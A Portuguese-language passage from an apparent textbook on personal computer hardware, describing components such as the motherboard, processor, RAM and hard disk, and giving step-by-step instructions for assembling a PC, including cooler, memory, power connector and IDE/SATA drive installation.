dor, memória RAM, os circuitos de apoio, as placas controladoras, os
slots do barramento e o chipset. A placa mãe deverá ser adquirida de
acordo com o processador.

Figura 1.1: Placa-Mãe

- Processador: É um circuito integrado que realiza as funções de


cálculo e tomada de decisão de um computador, por isso é conside-
rado o cérebro do mesmo. Ele também pode ser chamado de Unidade
Central de Processamento (em inglês CPU: Central Processing Unit).
Nos computadores de mesa (desktop) encontra-se alocado dentro do
gabinete juntamente com a placa-mãe e outros elementos de hardwa-
re. Os processadores trabalham apenas com linguagem de máquina
(lógica booleana). Realizam as seguintes tarefas:

- Busca e execução de instruçes existentes na memória. Os progra-


mas e os dados que ficam gravados no disco (disco rígido ou disque-
tes), são transferidos para a memória. Uma vez estando na memória,
o processador pode executar os programas e processar os dados;

- Controle de todos os chips do computador.

390
- Cooler para o processador (“fan” ou “Ventoinha”): Vem acopla-
da a um dissipador de calor e é encaixada sobre o processador. É
indispensável, pois evita que ele queime ou trave por super aqueci-
mento. A ventoinha deve ser compatível com o processador escolhido.

Figura 1.2: Processador

- Memória (RAM): Encaixada na placa-mãe, é vendida em módulos.


A capacidade de memória é expressa em megabytes (MB) ou giga-
bytes (GB) e quanto mais memória tivermos no microcomputador,
melhor. É importante notar que há alguns tipos diferentes de memó-
ria, e a placa-mãe do micro deverá ser compatível com a tecnologia
escolhida (as diferenças entre os tipos de memória serão abordas no
capítulo 2). É nesta memória que são carregados os programas em
execução e os respectivos dados do utilizador. Uma vez que se trata
de memória volátil, os seus dados são perdidos quando o computador
é desligado. Para evitar perdas de dados, é necessário salvar a in-
formação para suporte não volátil (por ex. disco rígido), ou memória
secundária.

391
Figura 1.3: Memória (RAM)

- Disco Rígido: Popularmente chamado também de HD (derivaço de


HDD do inglês hard disk drive) ou winchester (em desuso), é a parte
do computador onde são armazenadas as informações, ou seja, é a
memória permanente propriamente dita (não confundir com “memória
RAM”). É caracterizado como memória física, não-volátil, que é aquela
na qual as informações não são perdidas quando o computador é
desligado. O disco rígido é um sistema lacrado contendo discos de
metal recobertos por material magnético onde os dados são gravados
através de cabeças, e revestido externamente por uma proteção me-
tálica que é presa ao gabinete do computador por parafusos. É nele
que normalmente gravamos dados (informações) e é a partir dele que
lançamos e executamos nossos programas mais usados. Este
sistema é necessário porque o conteúdo da memória RAM é volátil,
ou seja, é apagado quando o computador é desligado. Desta forma,
temos um meio de executar novamente programas e carregar arqui-
vos contendo os dados da próxima vez em que o computador for liga-
do. O disco rígido é também chamado de memória de massa ou
ainda de memória secundária. Nos sistemas operacionais mais recen-
tes, o disco rígido é também utilizado para expandir a memória RAM,
através da gestão de memória virtual.

- Placa de Vídeo: Permite a comunicaço do microcomputador com o


monitor de vídeo.

Algumas placas-mãe trazem vídeo on-board, isto é, a própria placa-


mãe desempenha o papel da placa de vídeo. Caso você opte por
montar um micro usando esse tipo de placa-mãe, não será necessá-
rio adquirir uma placa de vídeo. Porém, para aplicações com mais
requisitos de vídeo (como jogos) pode ser necessário adquirir uma
placa de vídeo offboard.

392
Figura 1.4: Disco Rígido

- Unidade de disquete: unidade presente em computadores anti-


gos, não utilizada nos dias de hoje.

- CD-ROM, CD-R ou DVD-ROM: Apesar de em princípio esses com-


ponentes serem opcionais, como todos os programas estão sendo
comercializados em CD-ROM, torna-se indispensável a aquisição de
pelo menos uma unidade de CD-ROM. O preço dos gravadores de
CD (CD-R ou CD-RW) baixou muito. Com isso, analise a possibilida-
de de já adquirir um CD-R ou CD-RW em vez de uma unidade de CD-
ROM. Uma outra possibilidade é, em vez de adquirir um CD-ROM,
comprar logo um DVD-ROM, que permitirá a você ler CDs e DVDs em
seu micro, inclusive assistir a filmes.

- Placa de som: Esse é um componente teoricamente opcional (isto


é, um micro não precisa dele para funcionar), mas todo mundo quer
escutar os sons produzidos através do PC, e então a placa de som
tornou-se um equipamento presente em todos os micros. As placas-
mãe atuais geralmente vem com a placa de som integrada (áudio on-
board). Se este é seu caso, você não precisará comprar uma placa de
som avulsa.

- Teclado: Principal meio de entrada de dados para o micro.

- Mouse: Segundo maior meio de entrada de dados para o micro.

- Monitor de vídeo: Principal meio de saída de dados do micro.

- Estabilizador de Tensão: Indispensável. No estabilizador de tensão

393
ligamos o microcomputador, isolando-o da rede elétrica a fim de que
ele não seja danificado por flutuações da tensão elétrica ou ruídos
provenientes da rede.

- Impressora: A impressora é um componente opcional, mas obriga-


tório se você pretende ter o trabalho desenvolvido no micro impresso
em papel.

- Outros: Nós listamos apenas os componentes obrigatórios, que


todo micro deve ter. Outros componentes poderão ser comprados,
opcionalmente, caso você tenha necessidade deles, como scanner,
Zip-drive, joystick, câmera digital, entre outros.

1.1 O que determina se um pc é bom ou ruim.

Um equívoco muito comum é pensar que somente o processador da


máquina (ex: Pentium 4, Pentium III, Athlon, Duron, etc.) define se o
seu PC será bom ou ruim. Isso ocorre porque não é só o processador
escolhido que determinará o desempenho e a qualidade do seu
micro. A placa-mãe, tipo de memória RAM, disco rígido, placa de ví-
deo e os demais componentes do micro também influenciam direta-
mente no desempenho e qualidade do seu PC. O ponto de partida
para a escolha de qual micro montar é realmente a escolha do pro-
cessador. A escolha das demais peças do micro é tão importante
quanto a escolha do processador, mas, infelizmente, poucas pessoas
dão a devida atenço ao restante da lista.

Para você ter uma ideia mais concreta do que estamos falando, uma
placa- mãe, top de linha tem um desempenho muito superior ao das
placas-mãe mais baratas, chegando a fazer com que o micro tenha
um desempenho, muitas vezes, 20 por cento superior. Isso significa o
seguinte: se você montar um micro com um processador top de linha
mas usando uma placa-mãe de baixa qualidade (isto é, a mais barata
que você encontrar), poderá obter no final das contas um desempenho
inferior inclusive ao de um micro equipado com um processador inferi-
or, teoricamente mais lento. Um bom micro, portanto, não é aquele
que tem o processador mais rápido do mercado, mas sim aquele que
é coerente com a escolha das peças que o compõem. É no mínimo
incoerente você ter o processador mais caro do mercado instalado na

394
placa-mãe mais barata que você encontrou.

Outro ponto importantíssimo que você precisa saber antes de efetiva-


mente escolher as peças para o seu micro: para que você o utilizará?
Infelizmente a mídia como um todo enfatiza muito o processador da
máquina, mas se esquece de duas coisas. Primeiro, nem sempre o
processador mais possante do mercado é adequado a todos os usuá-
rios e o segundo ponto é que a mídia raramente explora a importância
das demais peças que o micro deve ter.

1.2 Entradas da placa mãe

As placas-mãe são desenvolvidas de forma que seja possível conectar


todos os dispositivos que compõem o computador. Para isso, elas
oferecem conexões para o processador, para a memória RAM, para o
HD, para os dispositivos de entrada e saída, entre outros. A foto a
seguir exibe uma placa-mãe. Trata-se de um modelo Soyo SY-KT880
Dragon 2. As letras apontam para os principais itens do produto, que
são um modelo Soyo SY-KT880 Dragon 2. As letras apontam para os
principais itens do produto, que são explicados nos próximos parágra-
fos. Cada placa-mãe possui características distintas, mas todas de-
vem possibilitar a conexão dos dispositivos que serão citados no de-
correr deste texto.

Figura 1.5: Entradas da Placa-Mãe

395
A) Processador
O item A mostra o local onde o processador deve ser conectado.
Também conhecido como socket, esse encaixe não serve para qual-
quer processador, mas sim para um modelo (ou para modelos) espe-
cífico. Cada tipo de processador tem características que o diferenci-
am de outros modelos. Essas diferenças consistem na capacidade de
processamento, na quantidade de memória cache, na tecnologia de
fabricação usada, no consumo de energia, na quantidade de termi-
nais (as “perninhas”) que o processador tem, entre outros. Assim
sendo, a placa-mãe deve ser desenvolvida para aceitar determinados
processadores. A motherboard vista acima, por exemplo, é compatí-
vel com os processadores Duron, Athlon XP e Sempron (todos da
fabricante AMD) que utilizam a forma de conexão conhecida por “So-
cket A”. Assim sendo, processadores que utilizam outros sockets,
como o Intel Pentium 4 ou o AMD Athlon 64 não se conectam a esta
placa. Por isso, na aquisição de um computador, deve-se escolher
primeiro o processador e, em seguida, verificar quais as placas-mãe
que são compatíveis.

À medida que novos processadores vão sendo lançados, novos so-


ckets vão surgindo. É importante frisar que, mesmo quando um pro-
cessador utiliza um determinado socket, ele pode não ser compatível
com a placa-mãe relacionada, isso porque o chip pode ter uma capa-
cidade de processamento acima da suportada pela motherboard. Por
isso, essa questão também deve ser verificada no momento da mon-
tagem de um computador.

B) Memória RAM
O item B mostra os encaixes existentes para a memória RAM. Esse
conector varia conforme o tipo. As placas-mãe mais antigas usavam o
tipo de memória popularmente conhecido como SDRAM. A placa-
mãe da imagem acima possui duas conexões (ou slots) para encaixe
de memórias DDR.

C) Slots de expansão
Para que seja possível conectar placas que adicionam funções ao
computador, é necessário fazer uso de slots de expansão. Esses
conectores permitem a conexão de vários tipos de dispositivos. Pla-

396
cas de vídeo, placas de som, placas de redes, modems etc, são co-
nectados nesses encaixes. Os tipos de slots mais conhecidos atual-
mente são o PCI (Peripheral Component Interconnect) – item C1 -, o
AGP (Accelerated Graphics Port) - item C2 -, o CNR (Communica-
tions Network Riser) - item C3 - e o PCI Express (PCI-E). As placas-
mãe mais antigas apresentavam ainda o slot ISA (Industry Standard
Architecture).

D) Plug de alimentação
O item D mostra o local onde deve-se encaixar o cabo da fonte que
leva energia elétrica à placa-mãe. Para isso, tanto a placa-mãe como
a fonte de alimentação devem ser do mesmo tipo. Existem, atualmen-
te, dois padrões para isso: o ATX e o AT (este último saiu de linha,
mas ainda é utilizado). A placa-mãe da foto usa o padrão ATX. É
importante frisar que a placa-mãe sozinha consegue alimentar o pro-
cessador, as memórias e a grande maioria dos dispositivos encaixa-
dos nos slots. No entanto, HDs, unidades de CD e DVD, drive de
disquete e cooler (um tipo de ventilador acoplado ao processador que
serve para manter sua temperatura em limites aceitáveis de uso)
devem receber conectores individuais de energia.

E) Conectores IDE e drive de disquete


O item E2 mostra as entradas padrão IDE (Integrated Drive Electro-
nics) onde devem ser encaixados os cabos que ligam HDs e unida-
des de CD/DVD à placa-mãe. Esses cabos, chamados de “flat ca-
bles”, podem ser de 40 vias ou 80 vias (grossamente falando, cada
via seria um “fiozinho”), sendo este último mais eficiente. Cada cabo
pode suportar até dois HDs ou unidades de CD/DVD, totalizando até
quatro dispositivos nas entradas IDE. Note também que E1 aponta
para o conector onde deve ser encaixado o cabo que liga o drive de
disquete à placa-mãe. Existe também um tipo de HD, hoje predomi-
nante, que não segue o padrão IDE, mas sim o SATA (Serial ATA),
como mostra a figura 1.6.

397
Figura 1.6: Entrada SATA

F) BIOS e bateria
O item F2 aponta para o chip Flash-ROM e o F1, para a bateria que o
alimenta. Esse chip contém um pequeno software chamado BIOS
(Basic Input Output System), que é responsável por controlar o uso
do hardware do computador e manter as informações relativas à hora
e data. Cabe ao BIOS, por exemplo, emitir uma mensagem de erro
quando o teclado não está conectado. Na verdade, quando isso ocor-
re, o BIOS está trabalhando em conjunto com o Post, um software
que testa os componentes de hardware após o computador ser liga-
do. Através de uma interface denominada Setup, também presente
na Flash-ROM, é possível alterar configurações de hardware, como
velocidade do processador, detecção de discos rígidos, desativação
de portas USB, etc. Como mostra
a figura 1.7, placas-mãe antigas usavam um chip maior para o BIOS.

Figura 1.7: BIOS

398
G) Periféricos externos
O item G aponta para a arte onde ficam localizadas as entradas para
a conexão do mouse (tanto serial, quanto PS/2), teclado, portas USB,
porta paralela (usada principalmente por impressoras), além de ou-
tros que são disponibilizados conforme o modelo da placa-mãe. Es-
ses itens ficam posicionados de forma que, quando a placa-mãe for
instalada em um gabinete, tais entradas fiquem imediatamente aces-
síveis pela parte traseira deste. A figura 1.8 mostra um outro modelo
de placa-mãe da Soyo, a SY-P4VGM, desenvolvida para o processa-
dor Intel Pentium 4, que exibe esses conectores através de outro
ângulo.

Figura 1.8: Entrada de Periféricos Externos

A disposição de entradas vista acima é semelhante em toda placa-


mãe que segue o padrão ATX. No antigo padrão AT, esse posiciona-
mento é de outra forma e alguns conectores são diferentes.

H) Furos de encaixe
Para evitar danos, a placa-mãe deve ser devidamente presa ao gabi-
nete. Isso é feito através de furos (item H) que permitem o encaixe de
espaçadores e parafusos. Para isso, é necessário que a placa-mãe
seja do mesmo padrão do gabinete. Se este for AT, a placa-mãe de-
verá também ser AT. Se for ATX (o padrão atual), a motherboard

399
também deverá ser, do contrário o posicionamento dos locais de en-
caixe serão diferentes para a placa-mãe e para o gabinete.

I) Chipset
O chipset é um chip responsável pelo controle de uma série de itens
da placa-mãe, como acesso à memória, barramentos e outros. Prin-
cipalmente nas placas-mãe atuais, é bastante comum que existam
dois chips para esses controles: Ponte Sul (I1) e Ponte Norte (I2):

Ponte Sul (South Bridge):


Este geralmente é responsável pelo controle de dispositivos de entra-
da e saída, como as interfaces IDE ou SATA. Placas-mãe que possu-
em som onboard (visto adiante), podem incluir o controle desse dis-
positivo também na Ponte Sul;

Ponte Norte (North Bridge):


Este chip faz um trabalho “mais pesado” e, por isso, geralmente re-
quer um dissipador de calor para não esquentar muito. Repare que
na foto da placa-mãe em que esse chip é apontado, ele, na verdade,
está debaixo de uma estrutura metálica. Essa peça é o dissipador.
Cabe à Ponte Norte as tarefas de controle do FSB (Front Side Bus -
velocidade na qual o processador se comunica com a memória e com
componentes da placa-mãe), da frequência de operação da memória,
do barramento AGP, etc. Os chipsets não são desenvolvidos pelas
fabricantes das placas-mãe e sim por empresas como VIA Technolo-
gies, SiS e Intel (esta é uma exceção, já que fabrica motherboards
também). Assim sendo, é comum encontrar um mesmo chipset em
modelos concorrentes de placa-mãe.

Placas-mãe onboard
“Onboard” é o termo empregado para distinguir placas-mãe que pos-
suem um ou mais dispositivos de expansão integrados, por exemplo,
placa de vídeo, placa de rede e placa de som.

A vantagem de se utilizar modelos onboard é a redução de custo do


computador, uma vez que deixa-se de comprar determinados disposi-
tivos porque estes já estão incluídos na placa-mãe. No entanto, é
necessário ter cuidado: quanto mais itens onboard uma placa-mãe
tiver, mais o desempenho do computador será comprometido. Isso

400
porque o processador acaba tendo que executar as tarefas dos dis-
positivos integrados. Na maioria dos casos, placas de som e rede
onboard não influenciam significantemente no desempenho, mas
placas de vídeo e modems sim.

As placas de vídeo, mesmo os modelos mais simples, possuem um


chip gráfico que é responsável pela geração de imagens. Este, por
sua vez, requer memória para tal, principalmente quando trata ima-
gens em 3D. Uma placa de vídeo onboard, mesmo quando acompa-
nhada de um chip gráfico integrado, acaba “tomando atenção” do
processador, além de usar parte da memória RAM.

Se um computador é comprado para uso em uma loja ou em alguma


aplicação que não requer muito desempenho, a compra de um com-
putador com placa-mãe onboard pode ser viável. No entanto, quem
deseja uma máquina para jogos e aplicações mais pesadas deve
pensar seriamente em adquirir uma placa-mãe “o board”, isto é, com
nenhum item integrado, ou no máximo, com placa de som ou rede
onboard.

Existe uma série de empresas que fabricam placas-mãe. As marcas


mais conhecidas são: Asus, Abit, Gigabyte, Soyo, PC Chips, MSI,
Intel e ECS. Apesar da maioria dessas fabricantes disponibilizarem
bons produtos, é recomendável pesquisar sobre um modelo de seu
interesse para conhecer suas vantagens e desvantagens.

Capítulo 2

Montagem do computador

O primeiro passo é tirar ambas as tampas do gabinete. Aproveite


para remover também as tampas das baias dos drives de CD e DVD
que for utilizar.

401
Remova também a tampa do painel ATX, ao lado das aberturas dos
exaustores. Cada placa-mãe utiliza uma combinação própria de co-
nectores, de forma que o que vem com o gabinete é inútil, já que
nunca combina com os conectores da placa-mãe. Por isso o substitu-
ímos pela tampa que acompanha a placa-mãe, feita sob medida para
ela. A tampa do painel ATX é chamada em inglês de “I/O plate”, em-
bora o nome seja pouco usado por aqui.

A parte interna do gabinete possui um padrão de furação, destinado


aos suportes e parafusos que prendem a placa-mãe. Todos os para-
fusos necessários devem vir junto com o gabinete.

Figura 2.1: Parafusos

Dependendo da marca e modelo, podem ser usados pinos plásticos,


como os da esquerda, encaixes como os da direita ou (mais comum)
espaçadores metálicos como os do centro. Existem ainda suportes
plásticos como os dois na parte inferior da foto, que podem ser usa-
dos como apoio, inseridos nos furos na placa-mãe que não possuam

402
par no gabinete. Eles eram mais usados antigamente, na época dos
gabinetes AT, mas é sempre
bom ter alguns à mão.

O conjunto com os parafusos e espaçadores necessários deve vir


junto com o gabinete. Ele é chamado de “kit de montagem” pelos
fabricantes. Normalmente o gabinete vem também com o cabo de
força, com exceção dos modelos sem fonte, onde o cabo vem junto
com a fonte avulsa.

As placas ATX possuem normalmente 6 furos para parafusos e mais


dois ou três pontos de apoio adicionais, que podem ser usados pelos
suportes plásticos. A posição deles, entretanto, varia de acordo com a
distribuição dos componentes na placa, de forma que o gabinete in-
clui um número muito maior de furos. Com o tempo, você acaba
aprendendo a descobrir quais usar “de olho”, mas no início você aca-
ba perdendo tempo comparando as furações da placa e do gabinete
para ver onde colocar os suportes.

Uma dica é que você pode usar uma folha de papel para achar mais
facilmente as combinações entre a furação da placa-mãe e a do ga-
binete. Coloque a placa-mãe sobre o papel e use uma caneta para
fazer pontos no papel, um para cada furo disponível. Depois, coloque
o papel sobre a chapa do gabinete e vá colocando os parafusos onde
os pontos coincidirem com a furação. Muito simples mas bastante
prático.

É importante apertar os parafusos de suporte usando uma chave torx,


para que eles continuem no lugar depois de parafusar e desparafusar

403
a placa-mãe. Se não forem bem apertados, os parafusos de suporte
acabam saindo junto com os usados para prender a placa-mãe ao
removê-la, o que não é muito agradável.

Com a placa-mãe presa no gabinete, chegou a hora de conectarmos


as funcionalidades do gabinete (Leds, Botão On/Off, Reset). Cada um
dos contatos é formado por dois pinos, um positivo e um neutro. Nos
conectores, o fio colorido corresponde ao positivo e o branco ao neu-
tro. Tanto os dois botões, quanto o speaker (que usa um conector de
4 pinos, embora apenas 2 sejam usados) não possuem polaridade,
de forma que podem ser ligados em qualquer sentido. Os LEDs por
sua vez, precisam ser ligados na polaridade correta, caso contrário
não funcionam.

Quase sempre, a própria placa traz uma indicação resumida decalca-


da, indicando inclusive as polaridades, mas em caso de dúvidas você
pode dar uma olhada rápida no manual, que sempre traz um esque-
ma mais visível.

Em seguida, temos os conectores das portas USB frontais, também


conectados diretamente na placa-mãe. Eles precisam ser encaixados
com atenção, pois inverter os contatos das portas USB (colocando o
polo positivo de alimentação na posição do negativo de dados, por
exemplo) vai fazer com que pendrives, mp3 e outros dispositivos ele-
trônicos conectados nas portas USB sejam queimados, um problema
muito mais grave do que deixar parafusos soltos ou inverter a polari-
dade de um LED, por exemplo.

404
Os conectores USB (ou headers USB) na placa-mãe são conectores
de 9 pinos, facilmente reconhecíveis. Cada porta USB utiliza 4 pinos,
dois para a alimentação e dois para dados, sendo que dentro de cada
par, um é o positivo e o outro o negativo. O nono pino do conector
serve apenas como orientação, indicando o lado referente aos dois
fios pretos, referentes ao polo neutro do par de alimentação.

Figura 2.2: Conectores das Entradas USB

Cada header USB inclui duas portas. Uma placa-mãe com “12 portas
USB” normalmente inclui 4 portas no painel traseiro e mais 4 headers
para a conexão das portas frontais do gabinete. Alguns gabinetes
possuem 4 portas frontais, mas a maioria inclui apenas duas. Existem
ainda diversos tipos de suportes com portas adicionais, leitores de
cartões e outras bugigangas instaladas na baia do drive de disquetes,
em uma das baias dos drives ópticos ou em uma das aberturas tra-
seiras. Assim como as portas frontais, eles também são ligados nos
headers USB da placa-mãe.

Dentro de cada header a ordem os fios é a seguinte: VCC (vermelho),


DATA - (branco), DATA+ (verde) e GND (preto), onde o GND fica
sempre do lado do nono pino, que serve como guia. Ligue primeiro os
pinos da porta 1, para não arriscar misturá-los com os da segunda
porta.

Fazendo isso com a atenção, não existe muito o que errar; o proble-
ma é que se você precisa montar vários micros, acaba tendo que
fazer tudo rápido, o que abre espaço para erros.

405
Figura 2.3: Instalação dos conectores das portas USB frontais do
gabinete

A partir de 2007, a Asus passou a fornecer “agrupadores” para os


conectores do painel e das portas USB frontais junto com as placas.
Eles são práticos, pois ao invés de ficar tentando enxergar as marca-
ções na placa-mãe você pode encaixar os conectores no suporte e
depois encaixá-lo de uma vez na placa-mãe.

Antes de instalar a placa-mãe dentro do gabinete, você pode aprovei-


tar também para instalar o processador, o cooler e os módulos de
memória. Com exceção dos antigos Pentiums e Athlons em formato
de cartucho, todos os processadores são ligados ao chipset e demais
componentes da placa-mãe através de um grande número de pinos
de contato.

406
Como o encapsulamento do processador é quadrado, seria muito fácil
inverter a posição de contato, o que poderia inutilizar o processador
quando o micro fosse ligado e a alimentação elétrica fornecida pela
placa-mãe atingisse os pinos errados.

Para evitar isso, todos os processadores atuais possuem uma distri-


buição de pinos que coincide com a do soquete em apenas uma po-
sição. Você pode notar que existe uma seta no canto inferior esquer-
do deste Athlon X2, que coincide com uma pequena seta no soquete.

Figura 2.4: Processador Conectado ao Soquete

Figura 2.5: Alavanca do Soquete

407
O encaixe do processador é genericamente chamado de “ZIF” (zero
insertion force), nome que indica justamente que você não precisa
fazer nenhuma pressão para encaixar o processador. A própria ação
da gravidade é suficiente para encaixá-lo no soquete. O ideal é sim-
plesmente segurar o processador alguns milímetros acima do soque-
te e simplesmente soltá-lo, deixando que a lei da gravidade faça seu
trabalho.

Isso evita que você entorte os pinos se estiver sonolento e tentar


encaixar o processador no sentido errado. A pressão necessária para
manter o processador no lugar é feita pelo próprio soquete, e não
pelo cooler. Isso faz com que a força necessária para fechar a ala-
vanca do soquete nas placas soquete seja muito maior.

Com o processador instalado, o próximo passo é usar a boa e velha


pasta térmica para melhorar a condutividade térmica com o cooler. A
ideia básica é passar uma fina camada de pasta térmica cobrindo
todo o dissipador do processador.

Se você simplesmente esparramar um montinho de pasta sobre o


processador, a pressão exercida pelo cooler vai se encarregar de
espalhá-la cobrindo a maior parte do dissipador de qualquer forma,
mas a aplicação nunca fica perfeita, de forma que se você tiver tempo
para espalhar a pasta uniformemente, antes de instalar o cooler, o
resultado será sempre um pouco melhor.

Muitos coolers vem com uma camada de pasta térmica (quase sem-
pre cinza) pré-aplicada. O principal objetivo é a praticidade, já que
elimina uma das etapas da instalação do cooler.

Caso prefira utilizar sua própria pasta térmica, remova a camada pré-
aplicada no cooler usando uma flanela e álcool isopropílico. Não use
espátulas ou qualquer outro objeto metálico, pois você vai arranhar a
base do cooler, o que também prejudica a dissipação de calor.

Para manter o processador firme no lugar (evitando mal contatos nos


pinos) e eliminar o excesso de pasta térmica o cooler precisa pressi-
onar o processador com uma certa pressão. Na maioria dos coolers

408
antigos, você precisava da ajuda de uma chave de fenda para instalar
e remover o cooler.

A ponta era presa em um pequeno encaixe na presilha do cooler e


você precisava de uma boa dose de força para encaixá-la no soque-
te.

Este sistema levava a acidentes, pois com frequência a chave de


fenda escapava, muitas vezes destruindo trilhas e inutilizando a pla-
ca-mãe. Como a pressão era exercida sobre os pinos laterais do so-
quete, também às vezes acontecia deles quebrarem. Para não ter
que descartar a placa-mãe, você acabava sendo obrigado a fazer
alguma fixação para prender ou colar o cooler no soquete.

Para solucionar estes dois problemas, tanto a Intel quanto a AMD


desenvolveram novos sistemas de encaixe. A AMD passou a usar
uma “gaiola” plástica em torno do processador.

Os pinos de encaixe ficam na gaiola, que é presa à placa por dois ou


quatro parafusos e pode ser substituída em caso de quebra. O cooler
é encaixado através de um sistema de alavanca, onde você encaixa a
presilha dos dois lados e usa a alavanca presente no cooler para
prendê-lo ao soquete.

Figura 2.6: Encaixe do Cooler Sobre o Processador

Nas placas soquete 775, a pressão necessária para manter o proces-


sador preso é exercida pelo encaixe metálico incluído no próprio so-
quete. A Intel se aproveitou disso para desenvolver um sistema de

409
encaixe bastante engenhoso, onde o cooler exerce menos pressão
sobre a placa-mãe e é preso por 4 presilhas.

As presilhas utilizam um sistema de retenção peculiar. Girando o


prendedor no sentido horário (o sentido oposto à seta em baixo rele-
vo) você o deixa na posição de encaixe, pronto para ser instalado.
Girando no sentido anti-horário, o prendedor de solta, permitindo que
o cooler seja removido.

Ao instalar o cooler, você só precisa deixar as presilhas na posição


de instalação e pressioná-la em direção a placa. Ao contrário dos
coolers para placas soquete 754, 939 e AM2, você pode encaixar o
cooler em qualquer sentido.

A forma correta de instalar o cooler é ir encaixando uma das presilhas


de cada vez, fazendo um “X”, onde você encaixa primeiro a presilha
1, depois a 3, depois a 2 e por último a 4.

É bem mais fácil instalar o cooler, antes de instalar a placa-mãe den-


tro do gabinete.

410
Figura 2.7: Instalação do Cooler Fora do Gabinete

Outra forma de instalar o cooler seria pressionar as 4 presilhas de


uma vez, usando as duas mãos, com a placa já instalada dentro do
gabinete. Esta segunda opção faz com que seja exercida uma grande
pressão sobre a placa-mãe, o que é sempre bom evitar.

Com o cooler instalado, não se esqueça de instalar o conector de


alimentação do cooler. As placas atuais oferecem pelo menos dois
conectores de alimentação; uma para o cooler do processador e outro
para a instalação de um exaustor frontal ou traseiro. Muitas placas
oferecem 3 ou 4 conectores, facilitando a instalação de exaustores
adicionais.

Para remover o cooler, basta girar as presilhas no sentido anti-


horário, destravando o mecanismo. É mais fácil fazer isso usando
uma chave de fenda.

Com relação à alimentação, existem dois tipos de conectores para o


cooler. Além do conector tradicional, com 3 pinos, existe o conector
PWM, que possui 4 pinos. Ele foi introduzido pela Intel em 2004 e é
usado na maioria das placas atuais (tanto para processadores Intel
quanto AMD). O conector de 4 pinos é perfeitamente compatível com
coolers que utilizam o conector antigo de 3 e você também pode co-
nectar coolers que utilizam o conector de 4 pinos em placas com o
conector de 3 pinos sem risco. A guia presente em um dos lados do
conector impede que você encaixe o conector invertido ou ocupando
os pinos errados, por isso não há o que errar.

411
No conector de 3 pinos, dois deles são responsáveis pela alimenta-
ção elétrica (+12V e GND), enquanto o terceiro é usado pela placa-
mãe para monitorar a velocidade de rotação do cooler (speed sen-
sor). O quarto pino permite que o BIOS da placa-mãe controle a velo-
cidade de rotação do cooler (PWM pulse), baseado na temperatura
do processador. Com isso o cooler não precisa ficar o tempo todo
girando na rotação máxima, o que além de reduzir o nível de ruído do
micro, ajuda a economizar energia.

Figura 2.8: Uso de Ferramenta para Destravar o Cooler

Figura 2.9: Conector do Cooler na Placa-Mãe

412
Ao conectar um cooler com o conector de 4 pinos em uma placa com
o conector de 3, você perde o ajuste da rotação, de forma que o coo-
ler simplesmente passa a girar continuamente na velocidade máxima,
mas com exceção disso não existe problema algum.

Continuando, você pode aproveitar também para instalar os módulos


de memória com a placa ainda fora do gabinete. O chanfro do conec-
tor impede que você encaixe um módulo DDR2 (ou DDR3) em uma
placa que suporte apenas módulos DDR ou vice-versa, de forma que
a principal dica é segurar sempre os módulos pelas bordas, evitando
assim qualquer possibilidade de danificá-los.

Figura 2.10: Instalaço do Módulo de Memória

Depois de tudo isso, podemos finalmente instalar a placa dentro do


gabinete, prendendo-a nos suportes usando parafusos. Na verdade,
você pode instalar a placa logo no início da montagem, e encaixar o
processador, cooler, memória e os conectores do painel frontal com
ela já dentro do gabinete. A questão é que é bem mais fácil instalar
estes componentes com a placa “livre” sobre a bancada do que den-
tro do espaço apertado no gabinete.

O próximo passo é ligar os conectores de força na placa-mãe. Prati-


camente todas as placas atuais utilizam tanto o conector ATX de 24
pinos e o conector P4, de 4 pinos, que fornece anergia adicional,

413
reforçando o fornecimento elétrico para o processador e também para
o slot PCI Express x16. Ao montar qualquer PC atual, você deve utili-
zar uma fonte de pelo menos 450 watts, que ofereça ambos os co-
nectores.

Figura 2.11: Conectores de Força

O próximo passo é instalar os drives. Alguns gabinetes são espaço-


sos o suficiente para que você instale os HDs antes mesmo de pren-
der a placa-mãe, mas na maioria dos casos eles ficam parcialmente
sobre a placa, de forma que você precisa deixar para instalá-los de-
pois.

Ao usar drives IDE, você precisa se preocupar também com a confi-


guração de master/slave. No caso do drive óptico (vou adotar este
termo daqui em diante, já que você pode usar tanto um drive de CD
quanto de DVD), o jumper está disponível bem ao lado do conector
IDE. Colocá-lo na posição central configura o drive como slave, en-
quanto colocá-lo à direita configura o drive como master. Para o HD,
a configuração do jumper varia de acordo com o fabricante, mas você
encontra o esquema de configuração na etiqueta de informação do

414
drive. Quase sempre, o HD vem configurado de fábrica como master
e ao retirar o jumper ele é configurado como slave.

HDs SATA não utilizam jumpers de configuração de master/slave,


pois cada porta permite a instalação de um único HD. Apesar disso, a
maioria dos drives incluem um jumper que permite forçar o HD a ope-
rar em modo SATA/150 (evitando problemas de compatibilidade com
algumas placas antigas).

Em muitos HDs (como na maioria dos modelos da Seagate) ele vem


ativado por padrão, fazendo com que o drive opere em modo SA-
TA/150 por default. Ao usar uma placa equipada com portas SA-
TA/300, não se esqueça de verificar a posição do jumper, para que a
taxa de transferência da interface não seja artificialmente limitada.

Figura 2.12: Jumpers em um HD IDE, HD SATA e drive de DVD IDE

Ao instalar o HD e o drive óptico em portas separadas, você pode


configurar ambos como master. Atualmente é cada vez mais comum
que placas novas venham com apenas uma porta IDE, o que o obriga
a instalar um como master e o outro como slave. É comum também
que o drive óptico seja instalado como slave mesmo ao ficar sozinho

415
na segunda porta, já deixando o caminho pronto para instalar um
segundo HD como master futuramente.

Ao usar dois (ou mais) HDs SATA, é importante que o HD de boot,


onde você pretende instalar o sistema operacional, seja instalado na
porta SATA 1. É possível mudar a configuração de boot através do
setup, dando boot através dos outros HDs, mas o default é que o
primeiro seja usado. A identificação de cada porta vem decalcada
sobre a própria placa-mãe. Na foto temos “SATA1” e “SATA2” indi-
cando as duas portas SATA e “SEC_IDE”, indicando a porta IDE se-
cundária. Ao lado dela estaria a “PRI_IDE”, a porta primária.

Figura 2.13: Conectores SATA

Nas placas e cabos atuais, é usada uma guia e um pino de controle,


que impedem que você inverta a posição da cabos IDE. Em placas e
cabos antigos é comum que estas proteções não estivessem presen-
tes. Nestes casos, procure um número 1 decalcado em um dos lados
do conector. A posição do 1 deve coincidir com a tarja vermelha no
cabo e, do lado do drive, a tarja vermelha fica sempre virada na dire-
ção do conector de força.

416
Figura 2.14: Conectores IDE

Os cabos IDE possuem três conectores. Normalmente dois estão


próximos e o terceiro mais afastado. O conector mais distante é o que
deve ser ligado na placa-mãe, enquanto os dois mais próximos são
destinados a serem encaixados nos drives. Ao instalar apenas um
drive no cabo, você deve usar sempre as duas pontas do conector,
deixando o conector do meio vago (nunca o contrário).

